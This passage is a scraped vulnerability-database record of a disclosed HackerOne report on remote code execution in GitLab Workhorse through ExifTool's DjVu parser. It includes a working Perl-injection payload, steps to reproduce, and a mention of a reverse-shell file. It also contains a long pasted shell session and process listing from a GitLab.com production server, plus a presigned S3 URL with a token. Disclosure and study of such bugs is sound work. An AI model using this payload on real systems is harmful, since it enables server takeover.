I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T01:29:47", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T01:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T01:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQVCBA6ERJ%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T012946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEG8aCXVzLXdlc3QtMiJGMEQCIGLufnzXqFNFWbsNY765bSKIcx2rjzUmkjo%2FKfVs4NIDAiAUdvJVkiGdNj%2B%2B3bviiKpUq9b6TVFXLc5kkLur90K8oCqDBAj4%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAIaDDAxMzYxOTI3NDg0OSIMu53iyUbPtVGpJKYtKtcDH%2Be3e16%2BQBm06z4Zx9aLc49rsoPrukBvclJcaTTOOjOu9lsPYXMo%2BcLc6vKzJ2VBX5VrCgvMQRW%2BP46lTSjBCpBOrRofBVrq8VK%2BNuku%2BWiGauArFGd9vx2xD2LJ51BniL%2B%2FFR7%2F9w%2Bka%2BfQpkdxKOZbHEGZLQo65YS3GWIbminB1FmqBALDN9snXskLRbr%2FrVNmRm833wcE9vxH6VqhsrcmfjW3lB29Vz2GK1H7w1e4SQXyu%2Ba5Opzyk2HQXJlyz3fY%2B%2Beg%2B9JEusjLwySH%2B1he7MrsvcCT9vhMMWXav%2FCw8uFxRkYbGFHI%2FcWptKva0rCZaDZrknrEu04ZYmniTvFUBr9Ql5bHpinI4U6G3wLGn634tdLmiS7%2FODOfJaqSrif%2FNmtf%2BAvDg9FKY1e9ZLbXaF6kf%2Fj38RQzyiBWQmrChxtoD7XVS7f%2B7AmwRdUDAYwCB0XXcfvnq%2B3vEZkaU%2BZYgTAymmFT%2FyVO1CnZ6TypQRYZiSYsfYPWj%2FITYQu22w13UdnSsmUTWUiFHCLCFNnzVvbYmxDqzfJ8vCsUi2S8bCTlyJhUYy8QI5HEb7XGV45mDW48rfk3utkXWpug7lr1uYdfuv4vfl58hlcE8WW9TMhwNmgDMIj2%2B4QGOqYBbeeRK%2BND01AgKYbqKyVhkY2iB8MHFYs2HvI4RGh6FRMq58d7RvLXS3QYSdolpqNdrG6zd3E22uEVqcDNs2xEUBfuQjJqhn%2FpJhWyrVOx%2F1Q%2F%2BOVgNn4j6gzF6L6gEncHy47wTg4o6ySm%2Fs0U676pHWsIXWgq9ih9ChXhtR%2BYajht8MbSnkWoUWmxJuXsmHuSXNcNEa4ouRLl1boNXefEcsU9eHRqig%3D%3D&X-Amz-Signature=dee05dc24af7c412c61b3ead1bb11c34d7fa4e216b2e4e1b0e27fcc44fdb4be7"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T01:29:47", "differentElements": ["h1reporter"], "edition": 5}, {"bulletin": {"id": "H1:1154542", "hash": "ea899890f0ee95dce950cc5b61aa3394", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby 